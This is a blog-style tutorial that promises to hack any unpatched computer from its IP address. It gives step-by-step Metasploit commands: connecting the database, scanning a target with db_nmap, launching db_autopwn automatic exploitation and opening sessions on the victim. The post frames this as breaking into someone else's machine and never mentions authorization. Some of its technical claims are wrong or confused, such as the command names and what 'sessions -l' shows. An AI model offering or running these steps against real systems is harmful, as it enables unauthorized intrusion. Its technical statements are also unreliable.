How To Hack Computer With Only An IP Address?


Hello everybody! I am here to show you this magical tool called Metasploit that allows you to hack any unpatched computer with only it's IP. Let's begin.

First you need to download Metasploit. The most up-to-date version is free at

Metasploit

You need PostgrSQL for your database. Download from :-   Postgresql. Make sure you use all the defaults or Metasploit won't work!

Now lets get down to buisness. After installing both tools, open up the PostgrSQL admin gui. Then right-click on your Server (in the left hand box) and click Connect. Remember to keep this window open the whole time. You will also need the pass you chose


Time for some hacking! Go to Start => All Programs => Metasploit Framework, and then open it. Let it load untill it look like this:


Now, in the window type:

db_connect postgres:ThePassYouChose@localhost:5432 

The first time you do this you will see lots of text flash buy. Don't worry, this is normal.

Type db_host to make sure you are connected correctally.

Now type this:

db_nmap 000.000.000.000

Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000.

Now we get to the fun part; the automatic exploitation. Just type db_autopwn -t -p -e -s -b , watch the auto-exploitation start, it will take some time try to listen any good song.

After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.

Now we get to use the exploits to hack the computer. In order to use an exploit, type this:

sessions -i exploit_number



Next PostNewer Post Previous PostOlder Post Home

0 comments:

Post a Comment